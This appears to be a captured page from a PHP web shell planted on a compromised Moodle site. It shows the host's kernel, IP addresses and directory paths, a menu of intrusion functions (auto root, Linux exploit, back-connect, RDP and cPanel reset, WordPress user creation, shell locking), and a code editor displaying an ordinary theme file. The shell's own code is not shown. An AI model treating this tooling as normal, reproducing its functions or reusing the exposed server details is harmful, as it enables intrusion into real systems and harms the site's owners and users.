Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.70.130.22
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
theme /
edumy /
ccn /
[ HOME SHELL ]
Name
Size
Permission
Action
block_handler
[ DIR ]
drwxr-xr-x
blog_handler
[ DIR ]
drwxr-xr-x
course_handler
[ DIR ]
drwxr-xr-x
event_handler
[ DIR ]
drwxr-xr-x
font_handler
[ DIR ]
drwxr-xr-x
form_handler
[ DIR ]
drwxr-xr-x
general_handler
[ DIR ]
drwxr-xr-x
mdl_handler
[ DIR ]
drwxr-xr-x
page_handler
[ DIR ]
drwxr-xr-x
rating_handler
[ DIR ]
drwxr-xr-x
user_handler
[ DIR ]
drwxr-xr-x
visualize
[ DIR ]
drwxr-xr-x
ccn_globalsearch.php
1.29
KB
-rwxr-xr-x
ccn_globalsearch_navbar.php
1.45
KB
-rwxr-xr-x
ccn_librarylist.php
2.19
KB
-rwxr-xr-x
ccn_loginform.php
3.39
KB
-rwxr-xr-x
ccn_registrationform.php
0
B
-rwxr-xr-x
ccn_themehandler.php
27.29
KB
-rwxr-xr-x
ccn_themehandler_context.php
20.7
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ccn_librarylist.php
<?php /* @ccnRef: @template block_cocoon_library_list */ defined('MOODLE_INTERNAL') || die(); include_once($CFG->dirroot . '/course/lib.php'); $_ccnlibrarylist = ''; $_ccnlibrarylist .= ' <ul id="vertical-menu" class="mega-vertical-menu nav navbar-nav">'; $topcategory = core_course_category::top(); if ($topcategory->is_uservisible() && ($categories = $topcategory->get_children())) { // Check we have categories. if (count($categories) > 1 || (count($categories) == 1 && $DB->count_records('course') > 200)) { // Just print top level category links foreach ($categories as $category) { $children_courses = $category->get_courses(); // print_object($children_courses); foreach($children_courses as $child_course) { if ($child_course === reset($children_courses)) { foreach ($child_course->get_course_overviewfiles() as $file) { if ($file->is_valid_image()) { $imagepath = '/' . $file->get_contextid() . '/' . $file->get_component() . '/' . $file->get_filearea() . $file->get_filepath() . $file->get_filename(); $imageurl = file_encode_url($CFG->wwwroot . '/pluginfile.php', $imagepath, false); $outputimage = $imageurl; // Use the first image found. break; } } } } $categoryname = $category->get_formatted_name(); $linkcss = $category->visible ? "" : " class=\"dimmed\" "; $_ccnlibrarylist .= ' <li><a href="'.$CFG->wwwroot .'/course/index.php?categoryid='.$category->id.'">'. $categoryname .'</a></li>'; } } } // } else { // Just print course names of single category // $category = array_shift($categories); // $courses = $category->get_courses(); // // if ($courses) { // foreach ($courses as $course) { // $coursecontext = context_course::instance($course->id); // $linkcss = $course->visible ? "" : " class=\"dimmed\" "; // // $_ccnlibrarylist .= ' // <li><a href="'.$CFG->wwwroot .'/course/view.php?id='.$course->id.'">'. $course->get_formatted_name() .' <span class="float-right">()</span></a></li> // // '; // } // } // } $_ccnlibrarylist .=' </ul> ';
Close